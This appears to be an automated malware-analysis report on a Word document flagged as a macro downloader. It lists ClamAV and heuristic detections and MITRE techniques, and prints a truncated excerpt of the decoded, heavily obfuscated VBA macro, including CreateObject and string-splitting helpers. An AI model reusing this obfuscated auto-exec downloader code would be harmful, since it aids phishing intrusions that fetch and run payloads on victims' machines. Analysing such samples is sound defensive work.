MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The critical ClamAV detection identifies it as 'Doc.Downloader.Logan-9781905-0', strongly suggesting its purpose is to download and execute a secondary payload. The obfuscated VBA code further supports this, as it likely contains logic to fetch and run additional malicious content.
Heuristics 6
-
ClamAV: Doc.Downloader.Logan-9781905-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Logan-9781905-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basf977b274eae3d98ca756a10910ec7f42c1a29b087c225685f92a2f289133a3d9 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18827 bytes |
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "J9bhulsu4okpn"
Function He19a_qqct6(Zu8viad2fi7d)
On Error Resume Next
Set BHbBAu = hnWmAK
Dim XxbZEiVJ(6 + 5 + 1 + 7) As String
XxbZEiVJ(VlYzI) = (1337 + 7)
szVeJiSD = RdneGqW
XxbZEiVJ(VlYzI) = (VKKzFYaTF + 4544)
XxbZEiVJ(VlYzI) = (6 + 57 + oDLACGDF)
Set HShVpITD = YNQxB
Dim FLTtEFD(5 + 6 + 1 + 7) As String
FLTtEFD(afngEI) = (7 + 6)
RikxMD = zgbCLBHZP
FLTtEFD(afngEI) = (VYFdGHCAA + 719)
FLTtEFD(afngEI) = (948 + 3 + tAfsFDy)
Set oniHDmKDE = QNGUG
Dim zerUJ(8 + 8 + 1 + 7) As String
zerUJ(ApQttEo) = (30 + 3)
TKKJIE = iFASF
zerUJ(ApQttEo) = (JpLYJF + 40)
zerUJ(ApQttEo) = (64 + 52 + NiojJIHG)
He19a_qqct6 = Join(Zu8viad2fi7d, Mx3i71r_7y98f)
Set SeHjFI = BYLkB
Dim GtmhF(5 + 6 + 1 + 4) As String
GtmhF(cJimvD) = (3593 + 30)
duADCcVyV = OVfDCbRD
GtmhF(cJimvD) = (aYaoHI + 22)
GtmhF(cJimvD) = (4266 + 598 + UZAxBJADB)
Set wzAqQAiN = bnJNCIA
Dim okpXBI(5 + 8 + 1 + 8) As String
okpXBI(aPxbxEbCB) = (882 + 8)
zYErs = pMnKJg
okpXBI(aPxbxEbCB) = (QEsGYYF + 3)
okpXBI(aPxbxEbCB) = (376 + 32 + JjpqHA)
Set JVORBID = WrqnC
Dim IyqOJClFA(8 + 6 + 1 + 6) As String
IyqOJClFA(uGTcIsCi) = (7 + 34)
eLGLZcK = tUwFZvHt
IyqOJClFA(uGTcIsCi) = (xFMfC + 9)
IyqOJClFA(uGTcIsCi) = (1280 + 6781 + ETmiaIH)
End Function
Function W0zcn1_o6t5(Mdk1zyotaw1kvda)
On Error Resume Next
Set JQTRDDB = oVLUB
Dim rBSfF(6 + 8 + 1 + 4) As String
rBSfF(KjWPxFP) = (176 + 2)
tEDyH = NttaIIF
rBSfF(KjWPxFP) = (RkZQZJ + 7)
rBSfF(KjWPxFP) = (4 + 8 + HYlRCYA)
Set SNaDDsHA = dDDAwGZ
Dim GVbLJ(5 + 8 + 1 + 7) As String
GVbLJ(jneBBDCd) = (17 + 14)
DOKGFAX = DahjM
GVbLJ(jneBBDCd) = (rCbuRAI + 950)
GVbLJ(jneBBDCd) = (3747 + 3 + vcyzH)
Set LKnuGA = NrIVoIvE
Dim CsGZxExGC(7 + 7 + 1 + 8) As String
CsGZxExGC(EPrbXeF) = (7481 + 1)
DQLZHBP = FzdEBUPDN
CsGZxExGC(EPrbXeF) = (hMoLkx + 1951)
CsGZxExGC(EPrbXeF) = (3286 + 8 + SxFdG)
Set W0zcn1_o6t5 = CreateObject(Mdk1zyotaw1kvda)
Set EKKaEIN = SqdRMHEE
Dim qCxeG(5 + 8 + 1 + 5) As String
qCxeG(tuLrLHbIp) = (43 + 27)
dJJSDjJR = GQCTAUE
qCxeG(tuLrLHbIp) = (XbyGL + 4655)
qCxeG(tuLrLHbIp) = (230 + 99 + ZFlxIK)
Set DLZRpFEg = HtMqsDIEZ
Dim qLqlHv(6 + 8 + 1 + 7) As String
qLqlHv(ovOlrS) = (252 + 24)
DOHDBI = BhfttFtzF
qLqlHv(ovOlrS) = (XWHmAGB + 3917)
qLqlHv(ovOlrS) = (812 + 39 + pYAjC)
Set ilJFJGm = pTYuAYP
Dim xGOWaC(7 + 8 + 1 + 6) As String
xGOWaC(HvtIFEzC) = (304 + 9349)
PqRlnHZkE = gDtBr
xGOWaC(HvtIFEzC) = (swbMKJDF + 12)
xGOWaC(HvtIFEzC) = (9 + 6522 + mhUIGbZu)
End Function
Function H461iq02y3s4mp(Wylmux_slnl9_undc6)
On Error Resume Next
Set XAcsKq = jzchHFioF
Dim QYHKXF(8 + 5 + 1 + 4) As String
QYHKXF(RWMDgEGJH) = (1 + 4)
lYPUg = CoPmBEFJD
QYHKXF(RWMDgEGJH) = (CgdrpDmWH + 9522)
QYHKXF(RWMDgEGJH) = (6 + 8775 + AdrMFE)
Set WKclB = mFshEGmDC
Dim XjKbIBb(8 + 5 + 1 + 6) As String
XjKbIBb(spEDDF) = (6 + 566)
NGwMcJAF = ewmpCFAlR
XjKbIBb(spEDDF) = (PkcFHEo + 2)
XjKbIBb(spEDDF) = (148 + 5 + LtUhC)
Set dQKRwQ = RUjducVk
Dim xdhLu(5 + 6 + 1 + 8) As String
xdhLu(fNtbIeJC) = (4 + 7575)
sWLiJmbI = VLjHH
xdhLu(fNtbIeJC) = (nSCnpS + 3)
xdhLu(fNtbIeJC) = (1 + 8 + vGUtC)
H461iq02y3s4mp = Split(Wylmux_slnl9_undc6, "=PO32")
Set bgqLgPHHZ = hGdysR
Dim CSPxCHFC(6 + 5 + 1 + 7) As String
CSPxCHFC(FcIQBJPDY) = (3 + 4)
FAHpSAJT = bcAPX
CSPxCHFC(FcIQBJPDY) = (qbGwALEF + 3993)
CSPxCHFC(FcIQBJPDY) = (4 + 905 + vnrQj)
Set xDPGFggiB = TgihrGA
Dim wuIyZBCqI(5 + 5 + 1 + 6) As String
wuIyZBCqI(naQvpYHf) = (43 + 40)
qXqtJIEEJ = GPYUJkb
wuIyZBCqI(naQvpYHf) = (dzMDE + 1)
wuIyZBCqI(naQvpYHf) = (9 + 63 + dodPmJ)
Set geWyCk = hYxhC
Dim ewNiEaF(7 + 6 + 1 + 7) As String
ewNiEaF(ZthUEv) = (74 + 4399)
XPuvgFxHJ = tsBXzBcI
ewNiEaF(ZthUEv) = (FRMpILEH + 3)
ewNiEaF(ZthUEv) = (8 + 858 + tCDXkJ)
End Function
Attribute VB_Name = "Rzbxee27ii3py1"
Attribute VB_Base = "0{29B1D78E-08FB-4EA1-AD90-C11E867946C1}{64FD6A9E-CB89-4642-920F-14B89AE18AF5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizabl
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.